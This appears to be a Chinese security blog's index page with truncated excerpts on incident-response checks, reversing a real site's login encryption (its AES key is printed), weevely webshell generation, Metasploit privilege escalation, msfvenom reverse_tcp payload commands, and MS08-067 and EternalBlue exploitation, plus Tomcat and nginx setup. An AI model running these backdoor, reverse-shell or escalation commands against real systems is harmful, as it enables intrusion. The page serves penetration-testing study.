应急响应之系统排查
Windows系统查看本地用户和组普通用户:win+r 输入lusrmgr.msc隐藏用户:win+r 输入regedit查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
系统日志分析win+r 输入eventvwr.msc 查看windows日志
网络与端口分析win+r 输入netstat -ano 查看活动连接
恶意进程分析win+r 输入tasklist 查看进程列表
自启动分析win+r 输入msconfig 查看自启动服务
检查计划任务win+r 输入schtasks
分析最近打开的文件win+r 输入%UserProfile%\Recent
Linux系统历史执行命令记录history
检查定时任务ls /etc/cron*
查看用户cat /etc/passwd # 查看用户信息文件cat /etc/shadow # 查看影子文件awk -F: '$3==0{print $1}' /etc/passwdcat /etc/passwd | grep x:0# 查看系统是否还 ...
记一次学习通登录逆向
打开浏览器,进入学习通登录页面。F12——随便输入账号密码点击登录——网络——fanyalogin–负载,这里发现uname和password使用了加密手段进行加密。
尝试搜索password了解使用什么加密手段。
这里找到了一个encryptByAES()函数,看起来像是加密方式,第一个参数为密码,第二个参数为密钥。
点击进去,跳转到源代码界面。看到了像是密钥的字符串transferKey = "u2oh6Vu^HWe4_AES"
为了验证密钥是否真实,再次搜索encryptByAES,找到它加密的方法。
同样点进去,在加密方法的返回值return处下个断点。
点击登录,发现已经断下来了,F9,单步走。
到这已经证实了猜想。下面复现一下它的加密过程,将encryptByAES的方法复制到在线js运行工具里调试。在原来的基础上加上一句代码调用它的方法,console.log(encryptByAES('123','u2oh6Vu^HWe4_AES'));
function encryptByAES(message, key){ let CBCOpti ...
weevely工具的使用
生成shellweevely generate 密码 路径 文件名
weevely generate cmd ./backdoor.php(weevely --man中有命令)weevely generate -obfuscator cleartext1_php cmd ./backdoor.php (用模板生成混淆的shell,weevely -generate --help中有命令)
连接shellweevely url 密码
weevely http://127.0.0.1/backdoor.php cmd
各项模块键入:help查看更多帮助信息
weevely>:help
信息搜集: :shell_su 通过更变使用者来执行shell命令,可以获得root权限来执行命令. :shell_sh 执行 shell 命令,例如:shell_php system('dir'); ...
利用MSF进行系统提权
直接输入提升权限命令meterpreter>getsystem
使用MSF内置BYPASSUAC提权MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。
msf6>search bypassuacexploit/windows/local/bypassuacexploit/windows/local/bypassuac_comhijackexploit/windows/local/bypassuac_eventvwr exploit/windows/local/bypassuac_fodhelperexploit/windows/local/bypassuac_injectionexploit/windows/local/bypassuac_injection_winsxsexploit/windows/local/bypassuac_sluihijackexploit/windows/local/bypassuac_vbs
使用MSF的enum_patches模块使用MSF的enum_patc ...
MSFのreverse_tcp反向连接
msf生成linux木马文件命令生成木马文件Windows:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86(x64)/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名PHP:msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.phpASP:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.aspJSP:msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jspWAR: ...
MS08_067漏洞复现(xp系统渗透)
漏洞简介MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括 测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验 证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火 墙配置有助于保护网络资源免受从企业外部发起的攻击。
漏洞原理:
MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCa ...
使用MSF框架进行系统渗透(永恒之蓝)
MSF简介Metasploit框架(Metasploit Framework, MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、 Web 、 CLI )。推荐使用控制台接口,通过控制台接口,你可以访问和使用所有Metasploit的插件,例如Payload、利用模块、 Post模块等。 Metasploit还有第三方程序的接口,例如Nmap、SQLMap 等,可以直接在控制台接口里使用,要访问该界面。
MSF五大模块类型Auxiliaries(辅助模块)该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。Exploit(漏洞利用模块)漏洞利用是指由渗透测试者利用 一个系统、应用或者服务中的安全漏洞进行的攻击行为 。流行的渗透攻击技术包括缓冲区溢出、 Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全 ...
搭建三个Tomcat,并实现负载均衡
安装vim和net-toolsyum install vim -yyum install net-tools -y
安装JDK环境将预先下载好jdk解压,并更名为jdk,移动到/usr/local/目录下
tar -zxf jdk-8u161-linux-x64.tar.gzmv jdk1.8.0_161/ jdkmv jdk /usr/localvim /etc/profile
写入如下内容:
JAVA_HOME=/usr/local/jdkPATH=$JAVA_HOME/bin:$PATHCLASSPATH=$JAVA_HOME/jre/lib/txt:$JAVA_HOME/lib/tools.jar export JAVA_HOME PATH CLASSPATH
使配置文件生效
source /etc/profile
java -version #查看是否安装成功
安装Tomcat将预先下载好的tomcat包解压,并更名为tomcat,移动到/usr/local/目录下,并复制另外两个Tomcat出来
tar -zxf apache-tomcat-8.5.84. ...
基于域名的虚拟主机的配置-nginx
安装Nginxyum install nginx -y
进入已配置好的网站根目录,创建两个测试文件夹文件夹中用于存放测试网站信息,即存放项目代码。
cd /usr/share/nginx/htmlmkdir Testpage-1mkdir Testpage-2
创建并编辑index.html文件index.html为将要显示的页面,同样可以把网站项目直接放在/usr/share/nginx/html/目录下,直接使用
cd /usr/share/nginx/html/Testpage-1/vim index.html按i进入编辑模式,输入以下测试内容。Test page 1:wq!保存
cd /usr/share/nginx/html/Testpage-2/vim index.html按i进入编辑模式,输入以下测试内容。Test page 2:wq!保存
配置Nginx运行以下命令查看nginx.conf配置文件。cat /etc/nginx/nginx.conf其中include /etc/nginx/conf.d/*.conf;表示Nginx将会从该路径下的所有.conf ...
搭建Nginx服务
yum安装nginxyum install nginx -y
查看nginx版本nginx -version
关闭防火墙systemctl stop firewalld
修改Nginx默认页面内容,浏览器访问ipvi /usr/share/nginx/html/index.html
可以添加修改Welcome to nginx!的内容,比如将Welcome to nginx!改为yjs213-22
也可以将index.html内容全部删除,直接添加自己想要的文字
也可以将网站源代码直接拉到/usr/share/nginx/html目录下,访问即可拥有做好的网站项目
